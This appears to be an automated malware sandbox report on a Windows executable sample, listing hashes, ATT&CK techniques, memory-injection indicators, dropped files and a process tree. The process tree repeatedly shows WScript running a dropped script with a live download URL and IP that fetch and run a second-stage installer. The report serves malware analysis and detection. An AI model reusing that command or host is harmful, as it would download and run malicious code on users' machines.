262a372f4d3d8f20f864c87f103a2771958a377b4c1585ca9c17ebb88521493f

Analysis

max time kernel
121s
max time network
126s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10/06/2024, 16:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe
Size

184KB
MD5

9b3e389444851c12149eced55e41d1c5
SHA1

0464eb5a621acec92c13d3cbf08ec2b8d5050662
SHA256

262a372f4d3d8f20f864c87f103a2771958a377b4c1585ca9c17ebb88521493f
SHA512

89a11f369bc52b5ab6add629d04a38639e65b1e29f74a75ebd4e10613a226973a62c01a58b7c20116b607dd1cb902e49f0316a2648f1432956ec661e9216191a
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3K:/7BSH8zUB+nGESaaRvoB7FJNndnn

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2996	WScript.exe
8	2996	WScript.exe
10	2996	WScript.exe
12	2324	WScript.exe
13	2324	WScript.exe
15	1672	WScript.exe
16	1672	WScript.exe
18	1912	WScript.exe
19	1912	WScript.exe
21	2456	WScript.exe
22	2456	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2648 wrote to memory of 2996	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	28
PID 2648 wrote to memory of 2996	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	28
PID 2648 wrote to memory of 2996	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	28
PID 2648 wrote to memory of 2996	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	28
PID 2648 wrote to memory of 2324	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	30
PID 2648 wrote to memory of 2324	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	30
PID 2648 wrote to memory of 2324	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	30
PID 2648 wrote to memory of 2324	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	30
PID 2648 wrote to memory of 1672	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	33
PID 2648 wrote to memory of 1672	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	33
PID 2648 wrote to memory of 1672	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	33
PID 2648 wrote to memory of 1672	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	33
PID 2648 wrote to memory of 1912	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	36
PID 2648 wrote to memory of 1912	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	36
PID 2648 wrote to memory of 1912	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	36
PID 2648 wrote to memory of 1912	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	36
PID 2648 wrote to memory of 2456	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	38
PID 2648 wrote to memory of 2456	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	38
PID 2648 wrote to memory of 2456	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	38
PID 2648 wrote to memory of 2456	2648	9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\9b3e389444851c12149eced55e41d1c5_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2648
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf99A1.js" http://www.djapp.info/?domain=DZbWxafvuo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf99A1.exe
  2⤵
  - Blocklisted process makes network request
  PID:2996
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf99A1.js" http://www.djapp.info/?domain=DZbWxafvuo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf99A1.exe
  2⤵
  - Blocklisted process makes network request
  PID:2324
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf99A1.js" http://www.djapp.info/?domain=DZbWxafvuo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf99A1.exe
  2⤵
  - Blocklisted process makes network request
  PID:1672
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf99A1.js" http://www.djapp.info/?domain=DZbWxafvuo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf99A1.exe
  2⤵
  - Blocklisted process makes network request
  PID:1912
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf99A1.js" http://www.djapp.info/?domain=DZbWxafvuo.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf99A1.exe
  2⤵
  - Blocklisted process makes network request
  PID:2456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
6920a0cafb08332f73014f451b77f9e6

SHA1
55b68d4ae2ab2090b01a5b53d13ece07593aea87

SHA256
88822c91402870e5fa196bc3cb0289dbc0feedd30eebd38820549b11424a3c84

SHA512
c839fad10dc726553d7dba296547afe68eacc95cb63bf4dfdbc064e16ca3d908fb1cd589e7bd8f6b0007c1c3b34e889a7a1f3eafb9bd9f80763a5801b3c7525f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
312a9d8a3309f748f366f6e3a7f4708e

SHA1
c1350641f0ebf239fdf250e443c334c67a2e6c86

SHA256
fbacab4dd41ec23cf2a4807313b8256435499cf458e5e7bb89d7bc393c958644

SHA512
fbf2445ff8d47e6d4682c106873960692aa496bdfc98d3175362403638cc55c5054752eff0b6528209caee9af82706ea9e9eb911f3dd7399fcb7095771edd01d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
48ab51ea70b1c8f24764b72f8c5edc7f

SHA1
15521421b4618fbafceb0c081e09f4367a2142a8

SHA256
312b74fb83e4396867202ff3884f52c765d1c37c01bd7f74b3c79d39f5f484a0

SHA512
0fe14e97f81049357f952c31773b2d8d22c3bbf34a85ad280d02b914d59f397cfdb6ae100cfb202d661685c5126a28bf41c5a9bd30df9ea686102c01b4618d69

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
c0ec2db20d05d8c5c0fa9f1c99c0defd

SHA1
0de959107817ab74f251757590a4910abac8d1a7

SHA256
08970f36a08654db0fa402bb412ba64bfb6c8392ed6204920c0f4cb643552ac3

SHA512
54b1ca215ca090c8674887447a3e5f6bcaf63148a927db9d7bc0f490bb29c4df45c905b987740e6575cf0c1a18e387977d176463930594b246f7f6cbf9d84f42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
2e99485d5e07f648c03e339565a75c9d

SHA1
40566811cce3416341a3ed594036da52366765f0

SHA256
20f29979677df691912d11656a105a28a864ea255974a2a0944a943f186bf928

SHA512
559968a8b16c233f1c5c10332be4416202de50b2b7bb9b01691349fa4da5370a1b6adce3bf9564d07f6efb83c57e0b6cd1f34ea16743d14ead947ed1c0a0a3a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
caa50a17a19fc47625177562afdc8ce9

SHA1
6f9fb99155363cc826ed2a596d818272ebc08962

SHA256
42ba2e2a3b6268df51f0603d82523fd17b11e5241394f976b319561c53bfabea

SHA512
85b6040318949e2eff62db7e171ebba46724f48a97bfdb153177530e4806924019f878a07db9c04f725f26d6e5e527d97533ab7936d2d6c2dd6f58e451d2ab3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
ff21c010ac2451395ee026f27d9118d6

SHA1
3f2e477646f1c5ee511ec6ccbde7c62f8dc2625f

SHA256
0fd19e57e4c21895391d25b4079ecc27909f49167fc6fc449934ad9057213fd3

SHA512
8e1db5e2879e362423c014baa0cd5e1acb0cdd113d95d3242fe9f8e47d73c9f115ad1734ae45f61f4df5d0813eb9f219d4cbf059e4d8d6d57ccfd655a5c3501d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
e8620bd77d1e460cb383bb3616696670

SHA1
f3d0b47278fc9f83a010222507b3ebc1f345bfbc

SHA256
1d1dff47af7220285de3db2d2628426734585010abc3bbcbcc9c4ec778dd9479

SHA512
db66c8bbae636c68834ffad2310f7ac42792e7250de42b1a65da28bf0effda2d6b98aa78786d492137bacf114cf96094e9100c078e7cf138cc7495c85e19d7d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE206.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF90F.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf99A1.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\RNAWMVRB.txt

Filesize
177B

MD5
b75a1fe45753db999ba9edb7808aa698

SHA1
9f754a1beffc758b7b2a881de1f324359733d181

SHA256
d5b2babd84e528ff57ee6d99d7b507ac83e4c4f1b57c6fb2479acaeb519d6f8a

SHA512
6d62c5397b56f59b28244092cab73b8ef18a41c92d50cf5bfed75e2e7825fd86b600ff4e5b7f4968f9af2d89e3b0bb9b62aedf9a63eea75d877a83633c37a9e8

Download Submit